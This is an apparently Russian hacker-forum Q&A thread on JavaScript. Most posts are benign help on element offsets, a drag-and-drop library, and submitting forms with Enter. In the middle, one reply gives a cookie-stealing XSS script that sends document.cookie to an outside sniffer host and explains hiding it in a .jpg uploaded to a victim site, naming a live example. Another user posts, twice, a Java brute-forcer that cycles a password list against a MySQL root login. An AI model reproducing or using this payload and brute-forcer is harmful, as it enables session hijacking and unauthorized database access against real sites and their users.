[JavaScript, AJAX] Задай вопрос, получи ответ

astrologer, но это не валидно

 

Я двигаю слой. Как узнать текущее положение слоя по x и по у? А впоследствии записать эти значения в файл.

 

offsetLeft и offsetTop.
А в файл самим JS не запишешь (если мы говорим о клиенте).
На серве легче всего средствами php. Передаешь из JS-скрипта значения на PHP-скрипт, и записываешь их в файл.

 

VDShark, не получилось, FF вообще не показывает такой параметр, а IE пишет "undefinied" =\

Вот пример того, что я делаю, помоги пожалуйста
http://webfile.ru/1860086

надо, чтобы скрипт показывал текущее положение слоя по х и по у

 

Isis, можно поменять на title или хранить отдельно в массиве.

orcismylife,

Code:

window.onload = function()
{
  var node = document.getElementById('drag1');
  alert('offsetTop: ' + node.offsetTop + '\n' + 'offsetLeft: ' + node.offsetLeft);
};

 

astrologer, нужно чтобы при каждом дропе писалось значение, а не толко при старте
Это возможно, учитывая те яваскрипты, которые я дал в архиве?

 

Я лишь показал, что значение всё же определено.
А вообще, думаю, тебе пригодится DOM-Drag.js (автор не я):

Code:

/**************************************************
 * dom-drag.js
 * 09.25.2001
 * www.youngpup.net
 **************************************************
 * 10.28.2001 - fixed minor bug where events
 * sometimes fired off the handle, not the root.
 **************************************************/

var Drag = {

	obj : null,

	init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
	{
		o.onmousedown	= Drag.start;

		o.hmode			= bSwapHorzRef ? false : true ;
		o.vmode			= bSwapVertRef ? false : true ;

		o.root = oRoot && oRoot != null ? oRoot : o ;

		if (o.hmode  && isNaN(parseInt(o.root.style.left  ))) o.root.style.left   = "0px";
		if (o.vmode  && isNaN(parseInt(o.root.style.top   ))) o.root.style.top    = "0px";
		if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right  = "0px";
		if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

		o.minX	= typeof minX != 'undefined' ? minX : null;
		o.minY	= typeof minY != 'undefined' ? minY : null;
		o.maxX	= typeof maxX != 'undefined' ? maxX : null;
		o.maxY	= typeof maxY != 'undefined' ? maxY : null;

		o.xMapper = fXMapper ? fXMapper : null;
		o.yMapper = fYMapper ? fYMapper : null;

		o.root.onDragStart	= new Function();
		o.root.onDragEnd	= new Function();
		o.root.onDrag		= new Function();
	},

	start : function(e)
	{
		var o = Drag.obj = this;
		e = Drag.fixE(e);
		var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
		var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
		o.root.onDragStart(x, y);

		o.lastMouseX	= e.clientX;
		o.lastMouseY	= e.clientY;

		if (o.hmode) {
			if (o.minX != null)	o.minMouseX	= e.clientX - x + o.minX;
			if (o.maxX != null)	o.maxMouseX	= o.minMouseX + o.maxX - o.minX;
		} else {
			if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
			if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
		}

		if (o.vmode) {
			if (o.minY != null)	o.minMouseY	= e.clientY - y + o.minY;
			if (o.maxY != null)	o.maxMouseY	= o.minMouseY + o.maxY - o.minY;
		} else {
			if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
			if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
		}

		document.onmousemove	= Drag.drag;
		document.onmouseup		= Drag.end;

		return false;
	},

	drag : function(e)
	{
		e = Drag.fixE(e);
		var o = Drag.obj;

		var ey	= e.clientY;
		var ex	= e.clientX;
		var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
		var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
		var nx, ny;

		if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
		if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
		if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
		if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

		nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
		ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

		if (o.xMapper)		nx = o.xMapper(y)
		else if (o.yMapper)	ny = o.yMapper(x)

		Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
		Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
		Drag.obj.lastMouseX	= ex;
		Drag.obj.lastMouseY	= ey;

		Drag.obj.root.onDrag(nx, ny);
		return false;
	},

	end : function()
	{
		document.onmousemove = null;
		document.onmouseup   = null;
		Drag.obj.root.onDragEnd(	parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]), 
									parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
		Drag.obj = null;
	},

	fixE : function(e)
	{
		if (typeof e == 'undefined') e = window.event;
		if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
		if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
		return e;
	}
};

Тут нужно только необходимые параметры указать.

 

Вопрос к отцам. подскажите как вставить код xss-ки в jpg?

 

ды очень просто. берёш запихиваеш код передачи куков на сниф

Code:

<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>

в текст документ и сохраняеш с расширением .jpg и пытаешся залить эту картинку на сайт жертвы. если есть фильтрация то скажет что формат не поддерживается.. если нет то картинка загрузится и значит xss есть

вот пример такой уязвимости хсс в картинке на яндэксе
http://narod.yandex.ru/community/photo/48/156948.jpg

скрипт в картинке можно залить в поле Фотография когда создаёш сообщество.

но такие хсс в картинках актуальны только под осликом

 

интерпретатор джава скрипта уже установлен в винде C:\WINDOWS\system32\cscript.exe

а выполнять java скрипты можно например так

создаёш текстовый документ пишеш в нём

Code:

<script>
тут твой скрипт
</script>

и сохраняеш с расширением .html

или например если хочеш выполнить скрипт который у тебя находится в файле скрипт.js то создаёш текстовый документ пишеш в нём

Code:

<script src="путь к срипту/скрипт.js"></script>

и сохраняеш с расширением .html

 

Что то я правильно всё сделал открываю и просто высвечивается белый экран по адресу file://localhost/C:/scrtipt_name.html (открывается при юзании фаила)
Это поидее скрипт для брута MySQL базы если к ней есть доступ не только с localhost (не хэша!):

Code:

/*  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+This is a little Disclaimer for if you havn't read the on on our site.	              	+  +The tools and 
tutorials KD-Team develops and publishes are only ment 
for        	+  +educational purpose only.WE DO 
NOT encourage the use of this tools and       	+  
+tutorials for mailicious purpose.We learned a lot during 
the development of them	+  +so we hope you also 
learn and don't just use it without any brains.	
	+  +We take completly NO responsability for any 
damage caused by them nor	+  +are we or our isp 
responsible for what you do with them.  		
	+  +Greetz: KD-Team				
		+  + http://www.kd-team.com		
			+  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
*/    /*   * Created on 1-okt-2005   * SSLClient v0.1   * 
TODO:   * 		- implement logger   *   * Credits:   *   * Author: KD-Team   */  import java.sql.*;  
import java.io.*;    public class BruteMySql  {  	
public static void main(String[] args)  	{  		
BufferedReader passwordReader;  		String 
curPass = "";  		String passFileName = "pass.txt";  		Connection con = null;    			try  			{  				Class.forName("com.mysql.jdbc.Driver");  			}  			catch (ClassNotFoundException cnfe)  			{  				cnfe.printStackTrace();  				System.exit(0);  			}    			try  			{  				passwordReader = new BufferedReader(new FileReader(passFileName));  				while((curPass = passwordReader.readLine()) != null)  				{  					try  					{  						String url ="jdbc:mysql://
***.***.***,***:3306/";  				
		DriverManager.setLoginTimeout(7);  	
					con = 
DriverManager.getConnection(url,"root", curPass);  	
				}  			
		catch(SQLException sqle)  		
			{  				
		//just ignore the password which are 
incorrect  					}    	
				if(con != null)  		
			{  				
		con.close();  				
		break;  				
	}  				}  		
	}  			
catch(FileNotFoundException fnfe)  			{  
				System.out.println("file 
with passes not found");  				
return;  			}  			
catch(IOException ioe)  			{  	
			
System.out.println(ioe.getStackTrace());  				return;  			}  			catch(SQLException sqle)  		
	{  				//ignore if we aren't able to close the connection  			}    
			System.out.println("CORRECT 
PASS: " + curPass);  	}  }

 

Rogun
это не javasript это Java два разных языка
так же как и vbscript (Visual Basic Script) и Basic

 

оО а я думаю, что то не то=/ а как запустить это? а то там всё равно текстовый фаил в формате "JAVA" через cmd он просто тупо открывается как тестовик ....

Code:

/*  ++++++++++++++++++++++++++++++++++++++++++++++++++  +++++++  
+This is a little Disclaimer for if you havn't read the on on our site.	              	+  +The tools and 
tutorials KD-Team develops and publishes are only ment 
for        	+  +educational purpose only.WE DO 
NOT encourage the use of this tools and       	+  
+tutorials for mailicious purpose.We learned a lot during 
the development of them	+  +so we hope you also 
learn and don't just use it without any brains.	
	+  +We take completly NO responsability for any 
damage caused by them nor	+  +are we or our isp 
responsible for what you do with them.  		
	+  +Greetz: KD-Team				
		+  + http://www.kd-team.com		
			+  
++++++++++++++++++++++++++++++++++++++++++++++++++  +++++++  
*/    /*   * Created on 1-okt-2005   * SSLClient v0.1   * 
TODO:   * 		- implement logger   *   * Credits:   *   * Author: KD-Team   */  import java.sql.*;  
import java.io.*;    public class BruteMySql  {  	
public static void main(String[] args)  	{  		
BufferedReader passwordReader;  		String 
curPass = "";  		String passFileName = "pass.txt";  		Connection con = null;    			try  			{  				Class.forName("com.mysql.jdbc.Driver");  			}  			catch (ClassNotFoundException cnfe)  			{  				cnfe.printStackTrace();  				System.exit(0);  			}    			try  			{  				passwordReader = new BufferedReader(new FileReader(passFileName));  				while((curPass = passwordReader.readLine()) != null)  				{  					try  					{  						String url ="jdbc:mysql://
***.***.***.***:3306/";  				
		DriverManager.setLoginTimeout(7);  	
					con = 
DriverManager.getConnection(url,"root", curPass);  	
				}  			
		catch(SQLException sqle)  		
			{  				
		//just ignore the password which are 
incorrect  					}    	
				if(con != null)  		
			{  				
		con.close();  				
		break;  				
	}  				}  		
	}  			
catch(FileNotFoundException fnfe)  			{  
				System.out.println("file 
with passes not found");  				
return;  			}  			
catch(IOException ioe)  			{  	
			
System.out.println(ioe.getStackTrace());  				return;  			}  			catch(SQLException sqle)  		
	{  				//ignore if we aren't able to close the connection  			}    
			System.out.println("CORRECT 
PASS: " + curPass);  	}  }

 

скачай java компилятор
http://qiq.ru/28/12/2006/programmy/jdk_and_jre___60.html

и вот почитай как запустить программу на java
http://coffeevarka.narod.ru/javatut/chap12.html

 

народ, как сделать чтоб форма по нажатию ентера отправлялась???

 

HTML:

<html>
<head>
	<script type="text/javascript">
		function subm(frm){
			if(event.keyCode == '13') frm.submit();
		}
	</script>
</head>
<body>
	<form onkeypress="subm(this);">
		<textarea></textarea>
	</form>
</body>
</html>

Нечто вроди такого... другой вопрос что на энтер м.б.не оч удобно - но думаю по подобию сделаешь.

 

спасиб, сработало, только onkeypress нада было не в form а в input запихивать

а блин облом, onkeypress срабатывает принажатии любой кнопки. так что не возмозно ввести ничо в поля

 

Ctrl + Enter

Code:

<html>
<head>
<script type="text/javascript">

function process(node, e)
{
  if(e.ctrlKey && e.keyCode == 13) node.submit();
};

</script>
</head>
<body>

<form onkeypress="process(this, event);">
  <textarea></textarea>
  <input type="text">
</form>

</body>
</html>

 

мне нужно просто ентер

 

1) В поле <input type="text"> нажатие энтера отправляет форму и без скрипта.
2) В поле <textarea> нужно как-то ставить перенос строки, верно?